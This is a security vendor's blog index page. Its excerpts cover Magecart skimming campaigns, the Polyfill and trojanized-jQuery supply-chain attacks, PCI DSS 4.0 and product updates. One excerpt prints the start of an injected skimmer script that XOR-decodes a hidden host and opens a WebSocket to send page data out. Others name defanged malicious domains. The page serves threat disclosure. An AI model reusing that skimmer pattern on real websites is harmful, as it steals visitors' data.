Blog
Industry News, Insights and Resources
The latest industry news, interviews, technologies, and resources.
Featured blog posts
Threat feeds fail to detect attack for +2 years
On this website, we can see it’s been active since August of 2022. We've notified this, and other websites of this attack.
The Polyfill attack explained
Recently over 490,000 websites were targeted in a web supply chain attack. We were amongst the first to report on this. A few articles who mentioned us include: * Security Week * Bleeping Computer * Hackread * PCMag * The Register NOTE: If a website is referencing the domains polyfill[.]io bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org and unionadjs[.]com today, they are still open to this attack. What was the Polyfill service project? Polyfill was originally an op
Affiliate tracking and its cyber security risks
Malicious actors often exploit tracking pixels to inject harmful scripts on otherwise normal websites.
The cost of false positives - how we became a target
This week, we identified an intriguing use case involving the WP3[.]XYZ attack (link to our blog post). It sparked interest across the community and led to better detection rates on platforms like VirusTotal (VirusTotal link). While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. Despite this, we aim to make the community aware of potential attacks and promise to do even better in the future. When fals
Over 5,000 WordPress sites caught in WP3[.]XYZ malware attack
We’ve uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: "https://wp3.xyz/plugin[.]php".
Why Content Security Policy doesn't work
Content Security Policy (CSP) is a security feature provided by web browsers that a website owner can use to define a set of rules that control which resources (e.g., scripts, styles, images) can be loaded and executed by the browser. We call this the client-side, which is at the very end of the web supply chain. When properly configured, it helps prevent a wide range of attacks. But those first three words make all the difference. It can help prevent: Cross-Site Scripting (XSS): By restricti
Introducing the c/side sidebar
We were running out of space. With some more custom views and new products coming our way we needed to create a bigger playing field, so we're introducing a new dashboard layout. The c/side sidebar houses a new range of views and easier access to features you need more regularly.
The differences in client-side security solutions
Client-side security is on the rise. With the growing need for 3rd-party scripts, the risks grow in parallel. Attackers no longer need to breach your server or backend, they exploit scripts loaded in your users’ browsers. Through these, they can steal sensitive data, compromise payments, and undermine trust. Businesses need to implement client-side solutions to mitigate these risks, but here’s the reality: not all client-side security solutions are created equal. Some vendors rely on outdated
Ad marketplaces security and compliance risks
For businesses monetizing through ad marketplace models, the less traditional 3rd-party advertising networks, analytics platforms, and marketing scripts are indispensable. They’re needed to drive revenue by boosting engagement and tracking user behavior.
New client-side attack only a proxy could stop
The malicious script behaves differently depending on how it is fetched. But on infected websites, it transforms into an obfuscated data-exfiltration payload designed to evade detection
A new Progressive Web App danger very few know about
The rise in adoption with PWAs comes an increase in client-side security risks. And the industry? It’s barely talking about it.
Real-time view of script
We're now offering a live view of scripts passing through our proxy. With this view its easier to track live activity on your website.
Polyfill - More than just a redirect attack
When we and news outlets reported the Polyfill attack, the reactions were surprisingly mild. This may have been due to the visible result: a simple redirect to obscure websites. But, as we outlined in our post-mortem, the potential consequences are far more severe: “Here the bad actor opted to only redirect users to adult and betting websites, however much worse could have happened. Listening in on keystrokes in a small percentage of sessions based on geolocation and time of the day, injecting
New 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com
This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it successfully identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here's a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a
New Magecart attack code revealed
On October 14th, we posted an article on how another Magento Magecart attack was taking place. Then we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
How web extensions can hurt your site (INFIRC[.]com and INFIRD[.]com)
The domain infirc[.]com and infird[.]com have caused quite the stir recently, and highlighted the dangers of infected or malicious web extensions. Infirc[.]com was first observed coming into our backend appearing as the referer header, even though it is not hosted or referenced by our site. Our public domains directory indexed the domain right after, and our internal detection engine flagged it as potentially malicious. Go to this page in our directory. Infirc[.]com is a newly registered dom
The Internet Archive Hack: How JavaScript fits in the picture
The Internet Archive, known best for The Wayback Machine, experienced a security breach yesterday. This was not the first time it had been targeted. A mocking JavaScript popup appeared, stating: Have you ever felt like the Internet Archive runs on sticks and is constantly on the verge of suffering a catastrophic security breach? It just happened. See 31 million of you on HIBP! HIBP, short for Have I Been Pwned?, is a site where users can check if their personal information has been compromise
The biggest Magecart attacks in history (so far)
Where the term “Magecart” comes from from Magecart attacks are a type of cyberattack where hackers inject malicious JavaScript code, often referred to as "skimming" scripts, into websites. This can be any type of website, but when talking Magecart, it’s almost exclusively e-commerce sites to try and capture credit card details. The term "Magecart" originates from the combination of "Magento," a popular open-source e-commerce platform, and "cart," referring to the shopping cart feature on these
New TTPs in Stealing PII and Financial Information from Magento Websites
At c/side, we actively monitor client-side supply chain attacks, with a focus on the evolving tactics, techniques, and procedures (TTPs) used by threat actors. One of the most common attacks we've observed over the past few months is the targeting of eCommerce websites built on the Magento framework. In particular, we've been closely following the Cosmic Sting attack (CVE-2024-34102), which has been widely reported, including by Sansec (https://sansec.io/research/cosmicsting). Recent TTP Obse
Why do websites need 3rd party scripts?
When developing a website, you’ll often include libraries to help speed up the development process, and avoid reinventing the wheel. However, there are times where you need to load a script from an external source. Due to recent attacks such as the Polyfill domain takeover, questions have been raised: why do you even need 3rd party scripts? How do they end up on a website? Firstly, let’s set the stage. 3rd party scripts are JavaScript files served from a server other than your own. For example,
c/side joins the PCI Security Standards Council as an Associate Participating Organization
We’re proud to announce that we've joined the Payment Card Industry Security Standards Council (PCI SSC) as an Associate Participating Organization. The PCI SSC leads a global, cross-industry effort to enhance payment security by establishing flexible, industry-driven data security standards. Through collaboration with other industry leaders, the Council’s mission is to protect payment data from emerging threats and meet the evolving needs of the payment ecosystem. As an Associate Participatin
Carlsberg a target in Magento “CosmicSting” malware attack
The term “Magecart” refers to attacks on the Magento platform. Recently, another large campaign was found to target Magento sites again. Among these, Carlsberg was one of the compromised websites. The pattern of these attacks is almost always the same. A single line of JavaScript loads content from a remote website. In other words, a 3rd party script. That code is then heavily obfuscated to delay detection even more. In this case, the payment process was quietly changed. A fake payment method
c/side joins the W3C
We’re incredibly proud to announce we have joined the W3C Web Application Security Working Group. The mission of the Web Application Security Working Group is to develop mechanisms and best practices to improve the security of web applications. Our whole team has been involved in cybersecurity for years. Through c/side, we now aim to raise awareness and set higher standards for client-side security. By joining forces, we are one step closer to achieving both of our goals. We want to publicly t
Kuwait ecommerce site is being used to facilitate client-side skimming attacks
A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection, exposing customer payment data. The vulnerability, likely linked to the CosmicSting bug in Magento, has been patched, but sites not updated remain at risk. Unlike other impacted sites, Shrwaa[.]com is being exploited as infrastructure for additional attacks. A URL scan shows numerous sites referencing Shrwaa[.]com, which hosts multiple malicious JavaScript
Threat feeds fail to detect attack for +2 years
On this website, we can see it’s been active since August of 2022. We've notified this, and other websites of this attack.
Why do developers obfuscate JavaScript?
As a client-side security company protecting JavaScript, we see a lot of obfuscated scripts. When you use our tool, you can actually see the deobfuscated version of the scripts to see what it is doing. Deobfuscation has been around for a while, but why is code obfuscated in the first place? JavaScript obfuscation came around to protect the source code of web applications from being easily understood, copied, or exploited by unauthorized users. Obfuscation as a concept predates JavaScript and e
Human Security Client-side Defense vs c/side
This article takes an honest look at the features of Human Security Client-side Defense. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify their claims yourself, please navigate to their product page. Human Security started in the bots detection space, and are well known for creating very sophistica
What is Client-Side Security?
Client-side security covers all operations occurring on a user's device, such as a browser on a computer or other device when interacting with a web application. Attacks targeting the client-side aim to manipulate the user’s interaction with that web application to steal data or inject malicious code. Why secure the client-side? A lot of attention is already placed on securing the supply chain. NPM and similar registries are covered by a range of solutions, cloud security is an entire indus
ButterCMS unreported downtime and security concerns
ButterCMS is a popular tool used to manage content for blogs. Earlier this week, we noticed a potentially severe security incident which triggered the team to remove ButterCMS from our site, and start an in depth investigation into what happened. Potentially 1.660 websites and over 5.800 domains were impacted. Our aim is to share the findings of our investigation to show what can happen when you trust dynamic 3rd parties without continuous verification. The ButterCMS incident We observed t
c/side raises a $6m seed round
We’re incredibly proud to announce our seed round of $6m, just six months after raising our pre-seed of $1.7m. Led by Uncork Capital as the lead, with participation from Mantis and PrimeSet. We also welcome back Scribble VC and Roar Ventures who supported us in the pre-seed. Together with this news, we’ve opened up our free tier to all. You can now sign up and start using c/side to monitor, secure, and optimize 3rd party scripts. We founded c/side to put client-side security on the map. For
Cisco client-side Magecart JavaScript attack
Another day, another high-profile client-side JavaScript attack. This morning, we read that Cisco is the next victim of malicious code being loaded through a third-party script. The Cisco Merchant website operates on the Magento Enterprise framework, which is widely used by eCommerce websites. Magento offers a robust and scalable platform, but like any system, it’s vulnerable to exploitation if security patches and updates aren’t applied timely. The exact version of Magento in use at the time o
c/side picked for TechCrunch Disrupt Startup Battlefield 2024
We’re incredibly proud to announce that we were selected for TechCrunch Disrupt Startup Battlefield in 2024. This year’s Startup Battlefield participants span artificial intelligence (AI), software as a service (SaaS), fintech, security, sustainability, space exploration and more. Out of thousands of startups, just 200 make the cut, and we are absolutely thrilled to be among this select group. We can not wait to share our product with the world Oct. 28 - Wed, Oct. 30 at Moscone West in San Fra
Feroot vs c/side
This article takes an honest look at the features of Feroot. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify their claims yourself, please navigate to their product page. c/side Feroot Doesn't solely rely on CSP policies ✔️ ✔️ Doesn't cause console errors ✔️ Client side JS script de
How to speed up JavaScript
Eliminate render-blocking resources, reduce unused JavaScript and minimize main thread work are usually found right on top of the PageSpeed Insights report. They talk about potential savings, but besides using the defer tag, there isn’t much info on how to do this. Though there are a few extra ways to get your pages loading faster by tackling JavaScript. Let’s get deferring out of the way first, and then give you some extra options. Defer or async? In short - deferring loading scripts ma
What are digital skimmers?
Recently, we read of a new significant cyberattack campaign that targeted hundreds of online stores, exploiting vulnerabilities in third-party scripts and plugins. This is a perfect example of a ‘digital skimmer’. Digital skimmers are snippets of code maliciously injected into legitimate websites. They target personal and credit card information. This problem is on the rise and is part of the reason c/side was created. Our proxy is able to detect this malicious code and prevent it from affect
Why browsers are becoming increasingly more dangerous
Technologies like WebAssembly (WASM), WebGPU, and IndexedDB have transformed what browsers can achieve. This evolution has expanded the functionality of browsers, massively evolving the use cases and experiences. However, this increased complexity also brings a significant cybersecurity concern: an enlarged attack surface. To understand where we are today, let’s take a trip down memory lane. Remember when you needed Flash Player to view rich multimedia content on websites? Adobe Flash was revo
The true cost of a cyber attack
Calculating the true cost of a cyber attack is difficult. None are the same, and companies respond differently. Yet it’s important to report on this in as much detail as possible to accurately represent the full picture of when this happens to your business. Suffering an attack usually comes with very large consequences. Taking preventative measures must be a priority for any company conducting business and having data online. Financial costs Probably the most obvious reason a company is c
Is Tuaw a scam in the making?
When we saw the new Fireship video yesterday, we were immediately reminded of the recent Polyfill attack. Our first article was picked up and referenced by most cybersecurity news outlets, and a week later we published our full post-mortem. When Fireship then reported on Tuaw, “The Unofficial Apple Weblog” a ton of people read back in the day, we thought it right to report on it as well. A quick recap before we get into the troubling stuff: Tuaw[.]com was acquired by AOL, but a few years late
Roll-back to a previous hash
In case scripts start misbehaving over time or you wish to pin to a static version of a script, you can now pin to a specific hash.
The Copay event-stream attack illustrates dependency risks
The JavaScript ecosystem experienced a significant shock with a sophisticated attack on Copay, a popular cryptocurrency wallet provider, in November 2018. Known as the event-stream attack, this incident highlighted the critical vulnerabilities associated with relying on third-party dependencies in software development. Copay is now known as Bitpay Wallet. Understanding the attack Event-stream, a popular npm package, was widely utilized by numerous projects for efficiently managing streams
The Segway cyber attack explained
In January 2022, the Segway web store suffered a web supply chain attack - also often referred to as a Magecart attack. In these types of attacks, malicious JavaScript code is added that loads from the client-side, known as third-party scripts. Many common tools are third-party scripts. Things like analytics, captchas and more. But this avenue can also be used for malicious reasons, as was the case here. In this attack on Segway, their store is set up on Magento. The attackers targeted vulnera
Don't deploy scripts site-wide
Third-party scripts are often deployed site-wide, typically injected in the head tags in web frameworks like Next.js via the ’_document.js’ file. This widespread implementation, while convenient for developers and often recommended by onboarding guides, means these scripts run across the entire site. This is simpler to implement, but it also introduces security risks and performance issues that are often overlooked. The recent Kaiser Permanente data leak shows the dangers of having poorly manag
Multi-Factor Authentication for everyone!
C/side now supports MFA natively for all plans. Our MFA support authenticator apps but also supports hardware tokens. Use your Yubikey or Apple Touch ID on c/side! Identity and access management shouldn't suck. So we invested the extra effort to make it work for you. You see active sessions of your account and can log-out previous sessions from our dashboard. We also notify you of new log-in attempts.
What is an attack vector and what are hidden ones
An attack vector in cyber security is the way an attacker takes advantage of security weaknesses. Some are more obscure than others. One that’s been our focus, is third party JavaScript. Since these scripts are installed by the website owner yet executed in the visitors' browsers, they're in a unique position. If something malicious occurs within these scripts, neither party is aware. The visitor is affected and the website owner becomes liable. We’ve seen this too many times, for example the
Web supply chain attack through trojanized jQuery on npm, GitHub and CDNs
Attacks have been found in trojanized jQuery on GitHub, npm and jsDelivr in a new web supply chain attack. Each package had a copy of jQuery with one small change: the ‘end’ function. This is part of the jQuery prototype, and was modified to include additional malicious code. In the malicious script, the attacker sends a non-blocking GET request using ‘$.ajax’ to other domains. The request URL includes a query parameter, which varies between different packages. As a result, whenever the end fun
How expired domains lead to cyber attacks
In 2018, British Airways was attacked through the exploitation of a third-party JavaScript package running on their site. The script was compromised and the attackers added lines of code that automatically copied all customer credit card and transaction details to a new domain: baways.com. This domain was cleverly purchased by the attackers a few days prior to the operation. c/side currently owns baways.com. If you visit the site, you'll find an explanation of the entire attack from beginning t
The Polyfill attack explained
Recently over 490,000 websites were targeted in a web supply chain attack. We were amongst the first to report on this. A few articles who mentioned us include: * Security Week * Bleeping Computer * Hackread * PCMag * The Register NOTE: If a website is referencing the domains polyfill[.]io bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org and unionadjs[.]com today, they are still open to this attack. What was the Polyfill service project? Polyfill was originally an op
What is the browser supply chain?
c/side is a cyber security product that lives in the browser supply chain space. We and other vendors operating here, like to talk about that supply chain. But, what do we exactly mean by it? The browser supply chain is the combination of components and processes that come together to render web pages, execute scripts, and ensure smooth functionality. This supply chain includes everything from the initial request for a webpage to the final rendering of that page in a user's browser. As well as
More than 490k websites targeted in web supply chain attack
NOTE: we now have a more complete article on the Polyfill attack here. The cdn.polyfill.io domain is currently being used in a web supply chain attack. It used to host a service for adding JavaScript polyfills to websites, but is now inserting malicious code in scripts served to end-users. Among the +490k websites targeted, it was confirmed the domain was still active on Disney-owned streaming service Hulu, The Guardian, Intuit and many more. Immediate Action: Check your code for any use of t
Why you can trust c/side
Our product exists to address security risks caused by 3rd party scripts. However, since c/side deploys through a third-party script, you might rightfully wonder why you should trust us. Here’s why: Script security is our bread and butter. For lots of vendors, serving the script is just a part of their product. We put every care and attention to detail in how we proxy, store and process scripts. We work to cover the blind spots that others might have missed. Let’s talk about that process. Fi
The BrowseAloud Supply-Chain Attack: A Case Study in Cryptojacking
In February 2018, over 4,000 websites, including high-profile government bodies like the UK's Information Commissioner’s Office (ICO), fell victim to the BrowseAloud attack. This was not just another cybersecurity breach; it was a potent reminder of the hidden dangers of third-party scripts in our increasingly interconnected digital ecosystems. What Happened in the BrowseAloud Attack? A seemingly benign third-party service called BrowseAloud, which helps websites enhance accessibility by conv
Ticketmaster Data Breach Déjà Vu: What You Need to Know
Yesterday on May 29, 2024, news broke of an alleged data breach involving Ticketmaster, a prominent ticket sales and distribution company. Ticketmaster has confirmed unauthorized activity within a third-party cloud database environment, claiming to have exposed the personal information of over 500 million customers. This breach includes sensitive data such as emails, phone numbers, addresses, and financial details. ShinyHunters, a notorious attacker, reposted the breach . According to reports,
Supply Chain Risk Doesn’t End At NPM
Supply Chain attacks are a top of mind problem today. The number of these attacks in the US increased by 115% between 2022 and 2023, according to Statista. Tools like Socket and Coana detect harmful code in registries like NPM. But the supply chain risk doesn’t end there. Some tools are 3rd party scripts that get fetched by the browser of the user. By only checking NPM (or another registry), you’re not protected from attacks through these scripts. These scripts, used for marketing tracking, ad
Kaiser Permanente Data Leak: A Case of Miscommunication and Inadequate Disclosure
On April 29th, healthcare giant Kaiser Permanente disclosed a data leak impacting 13.4 million current and former insurance members. The incident was rooted in improperly managed 3rd party scripts. The Incident Kaiser Permanente used tracking codes to monitor how its members navigated through its website and mobile applications. Some of these pages contained sensitive healthcare data, leading to the 3rd party scripts inadvertently transmitted information to third-party vendors they weren’t
Akamai Page Integrity Manager vs c/side
Akamai Page Integrity Manager vs c/side. Which is better? You’re on the c/side website, so we’re going to be a tad biased. Nevertheless, we’ll make our case. To further your research, here’s the Akamai Page Integrity Manager product page. First the differences in a table, below in more detail. The differences between Akamai Page Integrity Manager and c/side c/side Akamai Page Integrity Manager Client side JS script detection ✅ ✅ Uses threat feed intel ✅ ✅ Monitors Who-is re
The 2021 cdnjs Vulnerability in Detail
Verifying that your 3rd party script sources are reputable is important. But that alone may not be enough. That’s what the world learned in 2021, when a massive vulnerability in Cloudlfare’s cdnjs was flagged. Here’s the rundown of what, and how, it happened. Cdnjs is one of the most commonly used JavaScript Content Delivery Networks (CDNs) of today. Over 12% of all websites on the internet inject at least one script through cdnjs. A researcher with the screen name ‘RyotaK’ shared a supply cha
Jscrambler Webpage Integrity vs c/side
This article takes an honest look at the features of Jscrambler Web Page Integrity, another company focussing on client-side security. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify these claims yourself, please navigate to their product page. Jscrambler’s detection approach focuses on identifyin
Imperva Client-side Protection vs c/side
This article takes an honest look at the features of Imperva Client-side Protection. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify their claims yourself, please navigate to their product page. c/side Imperva Client-side Protection Doesn't solely rely on CSP policies ✔️ ✔️ Doesn't cau
Threat Feeds In The AI Era
The idea behind threat feeds is valid. But, we’d argue it’s past its prime at this point. And with where technology is today, there are better options. Threat feeds are (often) a list of community-sourced security information. When someone notices a vulnerability, they’ll put out a notice to the thread feed manually. It then gets picked up, and featured in the feed where security folk at their respective companies read it and check their own systems to see if they are prone to potential danger.
Cloudflare Page Shield vs c/side
This article takes an honest look at the features of Cloudflare Page Shield vs c/side. Since you’re on the c/side website, we acknowledge our bias. That said, we’ve built our case honestly and based our analysis on publicly available information, industry information, and our own or our customers' experiences. If you want to verify these claims yourself, please navigate to their product page. Unlike c/side, Cloudflare Page Shield does not act as part of the delivery flow of third-party script
The risk of only protecting your payment portals from 3rd party javascript attacks
PCI DSS 4.0 is here. By March 2025, it mandates that payment portals need to have a way to authorize each script on payment pages. Websites need to maintain an inventory of all scripts (on those payment portals at least) and ensure their integrity. You now need to detect and respond to unauthorized modifications on payment pages, including changes to HTTP headers and page contents. Organizations must check these configurations at least once every seven days or as determined by their risk analysi
PCI DSS 4.0 complete guide and steps
The Payment Card Industry Data Security Standard (PCI DSS) is a set of guidelines that ensures the safety of card transactions globally. Created by the PCI Security Standards Council, its goal is to protect against data theft and fraud in debit and credit card transactions. The latest version of the PCI standard, PCI DSS 4.0, changes the criteria while emphasizing ongoing security and introducing new compliance methods. It replaces the PCI DSS version 3.2.1 (May 2018) to strategically address e
Latest Releases
Introducing the c/side sidebar
We were running out of space. With some more custom views and new products coming our way we needed to create a bigger playing field, so we're introducing a new dashboard layout. The c/side sidebar houses a new range of views and easier access to features you need more regularly.
Real-time view of script
We're now offering a live view of scripts passing through our proxy. With this view its easier to track live activity on your website.
Roll-back to a previous hash
In case scripts start misbehaving over time or you wish to pin to a static version of a script, you can now pin to a specific hash.
Multi-Factor Authentication for everyone!
C/side now supports MFA natively for all plans. Our MFA support authenticator apps but also supports hardware tokens. Use your Yubikey or Apple Touch ID on c/side! Identity and access management shouldn't suck. So we invested the extra effort to make it work for you. You see active sessions of your account and can log-out previous sessions from our dashboard. We also notify you of new log-in attempts.